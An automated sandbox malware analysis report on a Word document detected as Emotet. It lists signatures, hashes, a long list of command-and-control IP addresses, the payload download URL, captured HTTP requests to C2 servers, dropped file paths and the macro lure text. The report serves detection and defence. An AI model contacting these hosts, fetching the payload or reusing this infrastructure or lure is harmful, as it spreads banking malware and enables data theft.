Analysis Report REP_YFTCM6TNB.doc

Overview

General Information

Sample Name: REP_YFTCM6TNB.doc
Analysis ID: 299650
MD5: ca9c0ac1e075a343fb2986772d0ae15b
SHA1: 4bb683d5490dba99a390f17e3f9c8839056d03e9
SHA256: 83af4eee8013969fd28932937f24ed1bb6031013a525dcd161ed6914b41feba5

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://wiwildcare.org/wp-includes/Ri/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.2348565916.00000000003C4000.00000004.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["208.180.207.205:80", "167.114.153.111:8080", "169.50.76.149:8080", "87.106.136.232:8080", "134.209.36.254:8080", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "194.4.58.192:7080", "123.176.25.234:80", "139.99.158.11:443", "174.106.122.139:80", "137.59.187.107:8080", "37.187.72.193:8080", "168.235.67.138:7080", "190.108.228.27:443", "139.59.60.244:8080", "184.180.181.202:80", "71.72.196.159:80", "47.144.21.12:443", "50.35.17.13:80", "103.86.49.11:8080", "47.36.140.164:80", "37.139.21.175:8080", "62.30.7.67:443", "139.162.60.124:8080", "104.131.11.150:443", "83.110.223.58:443", "74.208.45.104:8080", "50.91.114.38:80", "75.143.247.51:80", "209.54.13.14:80", "188.219.31.12:80", "194.187.133.160:443", "209.141.54.221:7080", "109.74.5.95:8080", "76.175.162.101:80", "96.245.227.43:80", "94.23.237.171:443", "118.83.154.64:443", "162.241.140.129:8080", "89.216.122.92:80", "5.196.74.210:8080", "121.7.31.214:80", "24.137.76.62:80", "76.171.227.238:80", "75.139.38.211:80", "5.39.91.110:7080", "71.15.245.148:8080", "94.200.114.161:80", "140.186.212.146:80", "62.75.141.82:80", "120.150.218.241:443", "203.153.216.189:7080", "124.41.215.226:80", "113.61.66.94:80", "139.162.108.71:8080", "79.98.24.39:8080", "69.206.132.149:80", "216.139.123.119:80", "74.214.230.200:80", "91.146.156.228:80", "97.82.79.83:80", "130.0.132.242:80", "5.196.108.189:8080", "176.111.60.55:8080", "172.104.97.173:8080", "78.24.219.147:8080", "61.33.119.226:443", "162.241.242.173:8080", "172.91.208.86:80", "68.252.26.78:80", "174.45.13.118:80", "85.25.106.204:8080", "157.245.99.39:8080", "185.94.252.104:443", "95.213.236.64:8080", "87.106.139.101:8080", "190.240.194.77:443", "93.147.212.206:80", "24.179.13.119:80", "120.150.60.189:80", "49.50.209.131:80", "104.131.123.136:443", "72.143.73.234:443", "91.211.88.52:7080", "121.124.124.40:7080", "220.245.198.194:80", "186.74.215.34:80", "78.188.106.53:443", "96.249.236.156:443", "46.105.131.79:8080", "79.137.83.50:443", "108.46.29.236:80", "181.126.74.180:80", "110.142.236.207:80", "80.241.255.202:8080", "208.180.207.205:80", "167.114.153.111:8080", "169.50.76.149:8080", "87.106.136.232:8080", "134.209.36.254:8080", "110.145.77.103:80", "61.19.246.238:443", "218.147.193.146:80", "194.4.58.192:7080", "123.176.25.234:80", "139.99.158.11:443", "174.106.122.139:80", "137.59.187.107:8080", "37.187.72.193:8080", "168.235.67.138:7080", "190.108.228.27:443", "139.59.60.244:8080", "184.180.181.202:80", "71.72.196.159:80", "47.144.21.12:443", "50.35.17.13:80", "103.86.49.11:8080", "47.36.140.164:80", "37.139.21.175:8080", "62.30.7.67:443", "139.162.60.124:8080", "104.131.11.150:443", "83.110.223.58:443", "74.208.45.104:8080", "50.91.114.38:80", "75.143.247.51:80", "209.54.13.14:80", "188.219.31.12:80", "194.187.133.160:443", "209.141.54.221:7080", "109.74.5.95:8080", "76.175.162.101:80", "96.245.227.43:80", "94.23.237.171:443", "118.83.154.64:443", "162.241.140.129:8080", "89.216.122.92:80", "5.196.74.210:8080", "12
Multi AV Scanner detection for submitted file
Source: REP_YFTCM6TNB.doc Virustotal: Detection: 53% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: REP_YFTCM6TNB.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.Ay8g9b.exe.3c0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.KBDFA.exe.3e0000.0.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_003E2580
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2240 CryptDestroyHash,CryptGetHashParam,CryptExportKey,CryptEncrypt,memcpy,CryptDuplicateHash, 5_2_003E2240
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E1FC0 CryptDuplicateHash,memcpy,CryptDestroyHash, 5_2_003E1FC0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C37E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW, 4_2_003C37E0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E37E0 FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindNextFileW,FindNextFileW,FindClose, 5_2_003E37E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wiwildcare.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 199.250.198.199:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 199.250.198.199:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49169 -> 169.50.76.149:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 167.114.153.111:8080
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 169.50.76.149:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.250.198.199 199.250.198.199
Source: Joe Sandbox View IP Address: 208.180.207.205 208.180.207.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View ASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /mr8v3zdEO6ruCbLbKue/i5hjth/RG2GfXJ6iUx/DWqEY0/4vWA6dPh4paaj8RZSBf/8V9ygZzkDyLCW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 167.114.153.111/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------wx7idGrrtMeBf51kS4mBsf9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.153.111:8080Content-Length: 4436Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.153.111
Source: unknown TCP traffic detected without corresponding DNS query: 169.50.76.149
Source: unknown TCP traffic detected without corresponding DNS query: 169.50.76.149
Source: unknown TCP traffic detected without corresponding DNS query: 169.50.76.149
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65283D3-1CF8-4E74-AA78-05F4F57053A0}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1Host: wiwildcare.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: wiwildcare.org
Source: unknown HTTP traffic detected: POST /mr8v3zdEO6ruCbLbKue/i5hjth/RG2GfXJ6iUx/DWqEY0/4vWA6dPh4paaj8RZSBf/8V9ygZzkDyLCW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 167.114.153.111/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------wx7idGrrtMeBf51kS4mBsf9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.153.111:8080Content-Length: 4436Cache-Control: no-cache
Source: KBDFA.exe, 00000005.00000002.2348952042.0000000002020000.00000004.00000001.sdmp String found in binary or memory: http://169.50.76.149:8080/95LWM5J/KhAnxoDnDe3M/
Source: Ay8g9b.exe, 00000004.00000002.2100145846.0000000002580000.00000002.00000001.sdmp, KBDFA.exe, 00000005.00000002.2349330527.00000000032C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Ay8g9b.exe, 00000004.00000002.2100145846.0000000002580000.00000002.00000001.sdmp, KBDFA.exe, 00000005.00000002.2349330527.00000000032C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00405289 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 4_2_00405289

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000005.00000002.2348565916.00000000003C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099123860.00000000002A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099228616.00000000003C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348537457.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348586235.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.Ay8g9b.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.KBDFA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E2580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_003E2580

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and then click EnableContent
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and then click EnableContert
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5411
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File created: C:\Windows\SysWOW64\spopk\ Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041604F 4_2_0041604F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411144 4_2_00411144
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041F22E 4_2_0041F22E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041048F 4_2_0041048F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411564 4_2_00411564
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041F772 4_2_0041F772
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410964 4_2_00410964
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00421A5E 4_2_00421A5E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00406AFA 4_2_00406AFA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041ECEA 4_2_0041ECEA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410D38 4_2_00410D38
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041FE6A 4_2_0041FE6A
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C81B0 4_2_003C81B0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7DD0 4_2_003C7DD0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C6500 4_2_003C6500
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7560 4_2_003C7560
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3AF0 4_2_003C3AF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3C10 4_2_003C3C10
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C1C90 4_2_003C1C90
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3DF0 4_2_003C3DF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3E17 4_2_003C3E17
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028382E 4_2_0028382E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028809E 4_2_0028809E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002890FE 4_2_002890FE
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028996E 4_2_0028996E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002859B5 4_2_002859B5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028598E 4_2_0028598E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00289D4E 4_2_00289D4E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028568E 4_2_0028568E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002857AE 4_2_002857AE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E81B0 5_2_003E81B0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3E17 5_2_003E3E17
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3C10 5_2_003E3C10
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E6500 5_2_003E6500
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E7560 5_2_003E7560
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E1C90 5_2_003E1C90
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3AF0 5_2_003E3AF0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E3DF0 5_2_003E3DF0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E7DD0 5_2_003E7DD0
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A382E 5_2_003A382E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A809E 5_2_003A809E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A568E 5_2_003A568E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A90FE 5_2_003A90FE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A996E 5_2_003A996E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A9D4E 5_2_003A9D4E
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A59B5 5_2_003A59B5
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A57AE 5_2_003A57AE
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003A598E 5_2_003A598E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: REP_YFTCM6TNB.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zm360615gr5, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: REP_YFTCM6TNB.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 0040FF83 appears 89 times
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410090 appears 56 times
PE file contains strange resources
Source: Ay8g9b.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000005.00000002.2348727506.0000000000800000.00000002.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Ay8g9b.exe, 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, KBDFA.exe, 00000005.00000003.2099150901.00000000003EF000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.sln
Source: Ay8g9b.exe, 00000004.00000002.2099093530.0000000000280000.00000040.00000001.sdmp, KBDFA.exe, 00000005.00000003.2099150901.00000000003EF000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.slnPK
Source: classification engine Classification label: mal100.troj.evad.winDOC@5/8@1/4
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E4B60 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,CloseHandle, 5_2_003E4B60
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00402743 LoadResource,LockResource,SizeofResource, 4_2_00402743
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C4F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap, 4_2_003C4F20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$P_YFTCM6TNB.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBE6.tmp Jump to behavior
Source: REP_YFTCM6TNB.doc OLE indicator, Word Document stream: true
Source: REP_YFTCM6TNB.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....Zz.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v....H[z.....0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................,..j....................................}..v.....hz.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................,..j......s.............................}..v.....hz.....0...............x.s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............|..j....................................}..v....H.{.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............|..j..... ..............................}..v......{.....0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............L!.j....X...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............L!.j....X...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............L!.j....X...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......s.l.3.,. .T.l.s."..."...........................}..v....p.......0................Js............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[...............L!.j....(...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5.6.............}..v............0................Js.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g...............L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
